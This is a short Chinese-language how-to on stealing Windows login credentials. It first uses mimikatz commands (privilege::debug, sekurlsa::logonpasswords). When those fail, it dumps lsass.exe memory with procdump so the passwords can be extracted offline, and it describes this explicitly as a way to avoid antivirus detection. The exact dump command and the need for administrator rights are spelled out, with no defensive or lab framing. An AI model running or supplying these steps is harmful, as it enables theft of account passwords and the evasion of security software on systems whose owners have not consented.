首先打開mimikatz_trunk2.0
在DOS運作界面中輸入privilege::debug提權指令1
我們提權成功後,我們再來輸入sekurlsa::logonpasswords抓取密碼指令
但是出現錯誤,如下圖
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIiclRnblN2XjlGcjAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL0MGROh3Yq50dRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnLyYzNxIjMzMjM5IDOwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
網上搜尋了一下,我決定使用procdump結合mimikatz實作免殺效果,procdump是微軟的官方工具,不會被殺.
首先在任務管理器找到lsass.exe,右鍵建立轉儲檔案
用procdump導出lsass.dmp後拖回本地抓取密碼來規避殺軟。
指令:
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
注意點:
使用管理者權限打開DOS視窗
*需将lsass.dmp移到procdump64.exe同目錄